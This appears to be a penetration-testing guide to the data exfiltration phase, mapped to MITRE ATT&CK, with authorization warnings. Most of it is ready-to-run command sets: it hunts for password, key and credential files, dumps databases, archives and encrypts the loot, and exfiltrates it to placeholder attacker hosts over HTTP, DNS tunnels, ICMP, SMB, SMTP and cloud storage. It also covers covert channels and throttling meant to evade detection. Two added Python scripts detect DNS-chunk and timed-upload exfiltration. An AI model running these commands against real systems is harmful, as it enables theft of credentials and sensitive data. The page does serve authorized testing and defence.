Post-Exploitation
Data Exfiltration
Data exfiltration demonstrates the real-world impact of a breach by extracting sensitive information. This phase validates access and shows stakeholders what an attacker could steal.
MITRE ATT&CK techniques:
- T1041 | Exfil Over C2
- T1048 | Exfil Over Alt Protocol
- T1567 | Exfil Over Web Service
- T1560 | Archive Collected Data

Warning
Only exfiltrate data with explicit authorization. Document what data you access and handle all data according to the Rules of Engagement. Never exfiltrate real PII/PHI unless specifically required.
```mermaid
flowchart LR
    A[Data Discovery] --> B[Collection]
    B --> C[Staging]
    C --> D[Exfiltration]
    D --> E[Evidence]
    subgraph Methods
        D --> D1[HTTP/S]
        D --> D2[DNS]
        D --> D3[ICMP]
        D --> D4[Cloud]
    end
    style A fill:#00ff00,stroke:#000,color:#000
    style E fill:#a855f7,stroke:#000,color:#000
```
Data Discovery
Windows File Search
```powershell
# cmd.exe - search for sensitive files by name
dir /s /b C:\*password*.txt C:\*password*.xlsx C:\*credential* 2>nul
dir /s /b C:\*.kdbx C:\*.key C:\*.pem C:\*.pfx 2>nul
# PowerShell equivalent
Get-ChildItem -Path C:\ -Recurse -Include *password*,*credential*,*secret* -ErrorAction SilentlyContinue
# cmd.exe - search file contents
findstr /s /i /m "password" C:\Users\*.txt
# findstr has no "|" alternation; space-separated strings are searched as alternatives
findstr /s /i /m "api_key secret token" C:\Users\*.config
# PowerShell content search
Get-ChildItem -Path C:\Users -Recurse -Include *.txt,*.xml,*.config -ErrorAction SilentlyContinue | Select-String -Pattern "password","secret","key" | Select-Object Path,LineNumber,Line
```
Linux File Search
```bash
# Find sensitive files
find / -name "*.conf" -o -name "*.config" -o -name "*password*" 2>/dev/null
find / -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null
find /home -name ".bash_history" -o -name ".mysql_history" 2>/dev/null
# Search file contents
grep -r "password" /etc/ 2>/dev/null
grep -r "password\|secret\|api_key" /var/www/ 2>/dev/null
# Find recent files (group the -name tests, otherwise -type/-mtime only apply to the first one)
find / -type f -mtime -7 \( -name "*.xlsx" -o -name "*.docx" \) 2>/dev/null
```
Network Share Discovery
```powershell
# Enumerate shares (Windows)
net view \\server
net share
# PowerView
Find-DomainShare -CheckShareAccess
Find-InterestingDomainShareFile
# CrackMapExec (from a Linux host)
cme smb 10.10.10.0/24 -u user -p pass --shares
cme smb 10.10.10.0/24 -u user -p pass -M spider_plus
# Search for interesting files on shares (from a Linux host)
smbclient //server/share -U user%pass -c 'recurse;ls'
```
Database Discovery
```powershell
# MySQL
mysql -u root -p -e "SHOW DATABASES;"
mysqldump -u root -p database_name > dump.sql
# MSSQL
sqlcmd -S localhost -U sa -P password -Q "SELECT name FROM sys.databases"
sqlcmd -S localhost -U sa -P password -Q "SELECT * FROM sensitive_table" -o output.csv
# PowerUpSQL
Get-SQLInstanceDomain | Get-SQLServerInfo
Get-SQLInstanceDomain | Get-SQLDatabase
# Extract connection strings from web configs
findstr /s /i "connectionstring" C:\inetpub\*.config
```
Data Collection & Staging
Archiving Data
```powershell
# Windows - compress for exfil
Compress-Archive -Path C:\Loot\* -DestinationPath C:\Temp\data.zip
# With password (7-Zip); -mhe=on also encrypts the file names
7z a -p"password" -mhe=on data.7z C:\Loot\*
# Linux
tar -czvf data.tar.gz /path/to/files
zip -r -e data.zip /path/to/files
# Split large files into 50 MB parts
split -b 50M data.tar.gz data_part_
```
Encoding/Encryption
```bash
# Base64 encode
# Windows
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\data.zip")) > encoded.txt
certutil -encode data.zip encoded.txt
# Linux
base64 data.tar.gz > encoded.txt
cat data.tar.gz | gzip | base64
# Encrypt with OpenSSL
openssl enc -aes-256-cbc -salt -in data.tar.gz -out data.enc -k password
# GPG symmetric encryption
gpg -c --cipher-algo AES256 data.tar.gz
```
Exfiltration Methods
HTTP/HTTPS
```bash
# Simple HTTP POST
curl -X POST -F "file=@data.zip" https://attacker.com/upload
# PowerShell
$bytes = [IO.File]::ReadAllBytes("C:\data.zip")
Invoke-WebRequest -Uri "https://attacker.com/upload" -Method POST -Body $bytes
# Python HTTP server (receiver)
python3 -m http.server 8080 # Serves downloads only
# For uploads use a custom script or a tool like updog
# wget POST
wget --post-file=data.zip https://attacker.com/upload
```
DNS Exfiltration
Information
DNS exfiltration is slow but often bypasses egress filtering. Useful when HTTP/HTTPS is blocked.
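Defender's counterpart, added here and not part of the original page: chunked-subdomain exfiltration of the kind this section covers leaves a distinctive trace in resolver logs, namely many distinct, long, high-entropy leftmost labels under one parent domain. The script below scores each query's leftmost label and flags parent domains that receive several such labels; the query names are constructed samples and the two-label "parent domain" heuristic is an assumption (a public-suffix list is the proper choice).

```python
import math
from collections import defaultdict

# Constructed sample of query names as a resolver log would record them (not real traffic).
# The attacker.com entries mimic base64 chunks of about fold -w50 length in the leftmost label.
SAMPLE_QUERIES = [
    "www.example.com",
    "mail.example.com",
    "U2VjcmV0IGRhdGEgZm9yIGV4ZmlsdHJhdGlvbiB0ZXN0IDAwMDAw.exfil.attacker.com",
    "MSBtb3JlIGNodW5rIG9mIGJhc2U2NCBlbmNvZGVkIGRhdGEgaGVyZQ.exfil.attacker.com",
    "cdn.example.com",
    "Y2h1bmsgbnVtYmVyIHRocmVlIG9mIHRoZSBleGZpbCBzdHJlYW0gMDE.exfil.attacker.com",
    "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0-static.cdn.example.net",
    "ZmluYWwgY2h1bmsgd2l0aCBwYWRkaW5nIGNoYXJhY3RlcnMgaGVyZSA.exfil.attacker.com",
]

def shannon_entropy(text):
    """Bits of entropy per character; encoded chunks score far higher than ordinary hostnames."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def parent_domain(qname):
    """Approximate the registered domain as the last two labels (assumption; use a public-suffix list)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])

def suspicious_label(label, min_len=40, min_entropy=3.5):
    """A long, high-entropy leftmost label looks like an encoded data chunk rather than a hostname."""
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy

def find_exfil_domains(qnames, min_chunks=3):
    """Return {parent_domain: distinct chunk count} for domains receiving repeated chunk-like queries.
    Requiring several distinct chunks under one domain filters out a lone long CDN hostname."""
    chunks = defaultdict(set)
    for q in qnames:
        labels = q.rstrip(".").split(".")
        if len(labels) < 3:  # need at least one subdomain label under the parent
            continue
        if suspicious_label(labels[0]):
            chunks[parent_domain(q)].add(labels[0])
    return {d: len(s) for d, s in chunks.items() if len(s) >= min_chunks}

if __name__ == "__main__":
    for domain, count in find_exfil_domains(SAMPLE_QUERIES).items():
        print(f"possible DNS exfiltration to {domain}: {count} distinct chunk-like labels")
```

Tune min_len and min_entropy against your own resolver logs before alerting; long but legitimate labels (CDN hashes, SPF macros) are why the per-domain count threshold exists.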
```bash
# DNScat2 server
dnscat2-server attacker.com
# DNScat2 client (on target)
./dnscat attacker.com
# Manual DNS exfil (encode data in subdomains)
# Max 63 chars per label, 253 total
# Note: base64's "+", "/" and "=" are not valid hostname characters, so hex or base32 is the usual encoding
for chunk in $(fold -w50 data.b64); do
    nslookup "$chunk.exfil.attacker.com"
done
# Iodine (DNS tunnel)
# Server
iodined -f -c -P password 10.0.0.1 tunnel.attacker.com
# Client
iodine -f -P password tunnel.attacker.com
```
ICMP Exfiltration
```bash
# ptunnel (ICMP tunnel)
# Server
ptunnel-ng -s
# Client
ptunnel-ng -p proxy_ip -l 8000 -r attacker.com -R 22
# Manual ICMP exfil (PowerShell): data travels in the echo request payload
$ping = New-Object System.Net.NetworkInformation.Ping
$data = [System.Text.Encoding]::ASCII.GetBytes("secretdata")
$ping.Send("attacker_ip", 1000, $data)
```
Cloud Storage
```bash
# AWS S3
aws s3 cp data.zip s3://exfil-bucket/
# Azure Blob
az storage blob upload --container-name exfil --file data.zip --name data.zip
# Rclone (supports many providers)
rclone copy data.zip remote:exfil/
# Google Drive (using gdrive)
gdrive upload data.zip
```
SMB/WebDAV
```powershell
# Copy to SMB share
copy data.zip \\attacker\share\
xcopy /s C:\Loot \\attacker\share\Loot
# Mount WebDAV and copy
net use Z: https://attacker.com/webdav /user:user pass
copy data.zip Z:\
# Linux SMB
smbclient //attacker/share -U user -c 'put data.zip'
```
Email (SMTP)
```powershell
# PowerShell SMTP
$smtp = New-Object Net.Mail.SmtpClient("smtp.company.com")
$msg = New-Object Net.Mail.MailMessage
$msg.From = "user@company.com"
$msg.To.Add("attacker@external.com")
$msg.Subject = "Report"
$attachment = New-Object Net.Mail.Attachment("C:\data.zip")
$msg.Attachments.Add($attachment)
$smtp.Send($msg)
# swaks (command line)
swaks --to attacker@external.com --from user@company.com --server smtp.company.com --attach data.zip
```
Covert Channels
Steganography
```bash
# Hide data in images
steghide embed -cf image.jpg -ef secret.txt
# Extract
steghide extract -sf image.jpg
# OpenStego
openstego embed -mf secret.txt -cf cover.png -sf output.png
```
Alternate Data Streams (Windows)
```powershell
# Hide file in ADS (cmd.exe)
type secret.txt > innocent.txt:hidden
# Read from ADS (cmd.exe)
more < innocent.txt:hidden
# List ADS (cmd.exe, then PowerShell)
dir /r
Get-Item -Path innocent.txt -Stream *
```
Exfiltration Tools
PacketWhisper
```bash
# DNS-based exfiltration using random DNS queries
# Evades signature detection by using real DNS lookups
# Transmit
python3 packetWhisper.py
# Select cipher, payload, and DNS server options interactively
```
DET (Data Exfiltration Toolkit)
```bash
# Supports multiple protocols: HTTP, DNS, ICMP, SMTP, Slack, etc.
# Server
python det.py -c config.json -L
# Client (send file)
python det.py -c config.json -f secret.zip
```
Cloakify
```bash
# Transform data to look like lists (IPs, words, etc.)
python cloakify.py secret.zip ciphers/pokemonNames > pokemon.txt
# Decloakify
python decloakify.py pokemon.txt ciphers/pokemonNames
```
Bandwidth Considerations
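Defender's counterpart to the throttled, chunked transfers this section covers, added here and not part of the original page: a fixed-size chunk sent on a timer produces outbound flows at a near-constant interval, which is what the function below looks for in flow records. The records are constructed samples in the shape (epoch seconds, source, destination, bytes sent); the thresholds are assumptions to tune per environment.

```python
import statistics
from collections import defaultdict

# Constructed flow records: (epoch seconds, source, destination, bytes sent). Not real traffic.
# 10.0.0.5 -> 203.0.113.10 shows a 1 MB-every-30-seconds pattern; 198.51.100.7 is ordinary browsing.
SAMPLE_FLOWS = [
    (1705312200, "10.0.0.5", "203.0.113.10", 1048576),
    (1705312205, "10.0.0.5", "198.51.100.7", 812),
    (1705312230, "10.0.0.5", "203.0.113.10", 1048576),
    (1705312261, "10.0.0.5", "203.0.113.10", 1048576),
    (1705312266, "10.0.0.5", "198.51.100.7", 1490),
    (1705312291, "10.0.0.5", "203.0.113.10", 1048576),
    (1705312320, "10.0.0.5", "203.0.113.10", 1048576),
    (1705312350, "10.0.0.5", "203.0.113.10", 1048576),
    (1705312402, "10.0.0.5", "198.51.100.7", 655),
]

def find_chunked_uploads(flows, min_flows=5, max_interval_cv=0.15, min_total_bytes=4 * 1024 * 1024):
    """Flag source->destination pairs whose outbound flows recur at a near-constant interval
    and together move a lot of data: the signature of a throttled, chunked transfer."""
    by_pair = defaultdict(list)
    for ts, src, dst, nbytes in flows:
        by_pair[(src, dst)].append((ts, nbytes))
    hits = {}
    for pair, recs in by_pair.items():
        if len(recs) < min_flows:
            continue
        recs.sort()
        intervals = [later[0] - earlier[0] for earlier, later in zip(recs, recs[1:])]
        mean_interval = statistics.mean(intervals)
        if mean_interval <= 0:
            continue
        # Coefficient of variation near zero means a timer-driven cadence, not human activity.
        cv = statistics.pstdev(intervals) / mean_interval
        total = sum(nbytes for _, nbytes in recs)
        if cv <= max_interval_cv and total >= min_total_bytes:
            hits[pair] = {"flows": len(recs), "interval_s": round(mean_interval, 1), "bytes": total}
    return hits

if __name__ == "__main__":
    for (src, dst), info in find_chunked_uploads(SAMPLE_FLOWS).items():
        print(f"{src} -> {dst}: {info['flows']} flows every ~{info['interval_s']}s, {info['bytes']} bytes")
```

The same cadence check applies to the rsync and curl rate-limited variants, which show up instead as one long-lived flow with a suspiciously flat throughput.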
```bash
# Throttle exfiltration to avoid detection
# Split and delay transfers
# Linux - rate limit (KB/s)
rsync --bwlimit=100 data.tar.gz attacker:/exfil/
# Windows PowerShell - chunked transfer
$chunkSize = 1MB
$file = [IO.File]::OpenRead("C:\data.zip")
$buffer = New-Object byte[] $chunkSize
while (($read = $file.Read($buffer, 0, $chunkSize)) -gt 0) {
    # Send the first $read bytes of $buffer here (transport of your choice)
    Start-Sleep -Seconds 30 # Delay between chunks
}
$file.Close()
# curl rate limit
curl --limit-rate 100K -F "file=@data.zip" https://attacker.com/upload
```
Documentation Template
```text
# Data Exfiltration Log
| Timestamp        | Source System | Data Type  | Size  | Method | Destination  |
|------------------|---------------|------------|-------|--------|--------------|
| 2024-01-15 10:30 | DC01          | NTDS.dit   | 500MB | HTTPS  | C2 Server    |
| 2024-01-15 11:45 | FILESERV      | Financials | 2GB   | SMB    | Attack Box   |
| 2024-01-15 14:00 | SQLSRV        | DB Dump    | 100MB | DNS    | Exfil Server |
# Important: Document but DO NOT keep actual sensitive data
# Screenshots and logs as proof, delete actual data
```
Danger
Delete all exfiltrated data after documentation. Never retain client PII, PHI, financial data, or other sensitive information beyond engagement requirements.